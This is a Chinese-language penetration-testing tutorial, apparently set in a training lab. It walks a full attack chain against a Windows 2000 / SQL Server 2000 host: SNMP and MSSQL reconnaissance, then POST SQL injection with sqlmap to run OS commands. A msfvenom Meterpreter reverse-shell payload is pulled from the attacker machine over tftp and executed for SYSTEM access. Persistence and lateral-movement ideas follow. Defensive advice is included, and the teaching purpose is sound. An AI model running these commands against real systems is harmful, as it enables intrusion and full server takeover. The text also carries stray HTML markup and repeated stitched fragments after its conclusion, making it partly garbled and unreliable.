渗透测试案例教学：从SQL注入到服务器控制<\/h1>

0x00 案例概述<\/h2>
本案例展示了一个完整的渗透测试过程，攻击者通过SQL注入漏洞作为突破口，最终完全控制了目标服务器。案例涉及多种渗透测试技术，包括信息收集、漏洞扫描、SQL注入利用、权限提升和远程控制。<\/p>

0x01 实验环境<\/h2>

目标靶机<\/strong>: 10.11.1.128

操作系统: Windows 2000<\/li>
Web服务器: Microsoft IIS 5.0<\/li>
数据库: Microsoft SQL Server 2000<\/li> <\/ul> <\/li>
攻击机<\/strong>: Kali Linux (10.11.0.74)<\/li> <\/ul>
0x02 信息收集阶段<\/h2>
1. SNMP服务扫描<\/h3>
使用snmp-check<\/code>工具扫描目标服务器的SNMP服务(端口161):<\/p>
snmp-check -c public 10.11.1.128 <\/span><\/span><\/code><\/pre>关键发现<\/strong>:<\/p> 系统信息: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)<\/li> 主机名: DJ<\/li> 域: WORKGROUP<\/li> 用户账户: Guest, IUSR_SRV2, IWAM_SRV2, Administrator, TsInternetUser<\/li> 网络接口信息<\/li> 开放的TCP端口: 21(FTP), 25(SMTP), 80(HTTP), 443(HTTPS), 445(SMB), 27900(MSSQL)等<\/li> 共享目录: C:\share<\/li> C:\Inetpub\wwwroot (Web根目录)<\/li> <\/ul> <\/li> <\/ul> 2. MSSQL服务扫描<\/h3> 使用Metasploit的mssql_ping<\/code>模块确认MSSQL服务:<\/p> msf > use auxiliary\/scanner\/mssql\/mssql_ping <\/span><\/span>msf auxiliary(<\/span>mssql_ping)<\/span> > set RHOSTS 10.11.1.128 <\/span><\/span>msf auxiliary(<\/span>mssql_ping)<\/span> > run <\/span><\/span><\/code><\/pre>关键发现<\/strong>:<\/p> SQL Server名称: DJ<\/li> 实例名: MSSQLSERVER<\/li> 版本: 8.00.194 (SQL Server 2000)<\/li> 连接方式: 命名管道: \DJ\pipe\sql\query<\/li> TCP端口: 27900<\/li> <\/ul> <\/li> <\/ul> 0x03 漏洞发现与利用<\/h2> 1. Web应用测试<\/h3> 发现POST类型的SQL注入漏洞:<\/p> URL: http:\/\/10.11.1.128\/login-off.asp<\/li> 注入参数: txtLoginID和txtPassword<\/li> <\/ul> 2. SQL注入验证<\/h3> 使用sqlmap进行深入测试:<\/p> sqlmap -u "http:\/\/10.11.1.128\/login-off.asp"<\/span> --data=<\/span>"txtLoginID=amdin&txtPassword=1&cmdSubmit=Login"<\/span> --dbs --current-user --is-dba --current-db --batch <\/span><\/span><\/code><\/pre>关键发现<\/strong>:<\/p> 注入类型: Stacked queries (堆叠查询)<\/li> 数据库类型: Microsoft SQL Server 2000<\/li> 当前用户: sa (系统管理员)<\/li> 当前数据库: bankdb<\/li> 用户权限: DBA (数据库管理员权限)<\/li> 可用数据库: bankdb, master, model, msdb, tempdb<\/li> <\/ul> 3. 操作系统命令执行<\/h3> 利用SQL注入执行操作系统命令:<\/p> sqlmap -u "http:\/\/10.11.1.128\/login-off.asp"<\/span> --data=<\/span>"txtLoginID=amdin&txtPassword=1&cmdSubmit=Login"<\/span> --os-cmd=<\/span>'命令'<\/span> --tamper=<\/span>space2mssqlblank.py <\/span><\/span><\/code><\/pre>注意<\/strong>: 使用space2mssqlblank.py<\/code>脚本绕过可能的过滤机制。<\/p> 0x04 攻击实施<\/h2> 1. 生成Payload<\/h3> 使用msfvenom生成Meterpreter反弹shell:<\/p> msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>10.11.0.74 LPORT=<\/span>4444<\/span> -f exe -o rshell.exe <\/span><\/span><\/code><\/pre>2. 设置TFTP服务器<\/h3> 将生成的rshell.exe放入Kali的TFTP服务器目录。<\/p> 3. 下载Payload到目标服务器<\/h3> 通过SQL注入执行TFTP命令下载payload:<\/p> sqlmap -u "http:\/\/10.11.1.128\/login-off.asp"<\/span> --data=<\/span>"txtLoginID=amdin&txtPassword=1&cmdSubmit=Login"<\/span> --os-cmd=<\/span>'cd c:\inetpub\wwwroot\ && tftp -i 10.11.0.74 get rshell.exe'<\/span> --tamper=<\/span>space2mssqlblank.py <\/span><\/span><\/code><\/pre>4. 执行Payload<\/h3> 通过SQL注入执行下载的payload:<\/p> sqlmap -u "http:\/\/10.11.1.128\/login-off.asp"<\/span> --data=<\/span>"txtLoginID=amdin&txtPassword=1&cmdSubmit=Login"<\/span> --os-cmd=<\/span>'c:\inetpub\wwwroot\rshell.exe'<\/span> --tamper=<\/span>space2mssqlblank.py <\/span><\/span><\/code><\/pre>5. 建立Meterpreter会话<\/h3> 在攻击机上启动Metasploit监听:<\/p> msf > use exploit\/multi\/handler <\/span><\/span>msf exploit(<\/span>handler)<\/span> > set payload windows\/meterpreter\/reverse_tcp <\/span><\/span>msf exploit(<\/span>handler)<\/span> > set LHOST 10.11.0.74 <\/span><\/span>msf exploit(<\/span>handler)<\/span> > set LPORT 4444<\/span> <\/span><\/span>msf exploit(<\/span>handler)<\/span> > exploit <\/span><\/span><\/code><\/pre>成功获取SYSTEM权限的Meterpreter会话。<\/p> 0x05 技术要点总结<\/h2> 信息收集的重要性<\/strong>:<\/p> SNMP扫描可以获取大量系统信息<\/li> 服务识别有助于确定攻击方向<\/li> <\/ul> <\/li> SQL注入利用<\/strong>:<\/p> Stacked queries注入允许执行多条SQL语句<\/li> sa权限意味着可以直接执行操作系统命令<\/li> <\/ul> <\/li> 权限提升<\/strong>:<\/p> 利用数据库管理员权限执行系统命令<\/li> 通过TFTP传输payload避免直接上传<\/li> <\/ul> <\/li> 后渗透阶段<\/strong>:<\/p> Meterpreter提供了强大的后渗透功能<\/li> SYSTEM权限意味着完全控制系统<\/li> <\/ul> <\/li> <\/ol> 0x06 防御建议<\/h2> SQL注入防护<\/strong>:<\/p> 使用参数化查询<\/li> 实施输入验证和过滤<\/li> 最小化数据库账户权限<\/li> <\/ul> <\/li> 系统加固<\/strong>:<\/p> 禁用不必要的服务(如SNMP)<\/li> 限制数据库账户的操作系统权限<\/li> 禁用xp_cmdshell等危险存储过程<\/li> <\/ul> <\/li> 监控与日志<\/strong>:<\/p> 监控异常数据库活动<\/li> 记录所有SQL查询<\/li> 监控可疑的进程创建<\/li> <\/ul> <\/li> 网络防护<\/strong>:<\/p> 限制出站连接(防止TFTP下载)<\/li> 实施网络分段<\/li> 使用防火墙规则限制数据库访问<\/li> <\/ul> <\/li> <\/ol> 0x07 扩展思考<\/h2> 替代攻击路径<\/strong>:<\/p> 如果SQL注入不可用，可以尝试FTP或SMB服务<\/li> IIS 5.0可能存在已知漏洞可利用<\/li> <\/ul> <\/li> 权限维持<\/strong>:<\/p> 创建持久性后门<\/li> 添加隐藏用户账户<\/li> 安装rootkit<\/li> <\/ul> <\/li> 横向移动<\/strong>:<\/p> 收集域内其他主机信息<\/li> 尝试传递哈希攻击<\/li> 利用获取的凭证访问其他系统<\/li> <\/ul> <\/li> <\/ol> 本案例展示了从信息收集到完全控制服务器的完整过程，强调了安全配置和漏洞修复的重要性。<\/p>

渗透测试案例教学：从SQL注入到服务器控制<\/h1>

0x00 案例概述<\/h2> 本案例展示了一个完整的渗透测试过程，攻击者通过SQL注入漏洞作为突破口，最终完全控制了目标服务器。案例涉及多种渗透测试技术，包括信息收集、漏洞扫描、SQL注入利用、权限提升和远程控制。<\/p>

0x02 信息收集阶段<\/h2>

0x03 漏洞发现与利用<\/h2>

2. 设置TFTP服务器<\/h3> 将生成的rshell.exe放入Kali的TFTP服务器目录。<\/p>

0x00 案例概述<\/h2>
本案例展示了一个完整的渗透测试过程，攻击者通过SQL注入漏洞作为突破口，最终完全控制了目标服务器。案例涉及多种渗透测试技术，包括信息收集、漏洞扫描、SQL注入利用、权限提升和远程控制。<\/p>

2. 设置TFTP服务器<\/h3>
将生成的rshell.exe放入Kali的TFTP服务器目录。<\/p>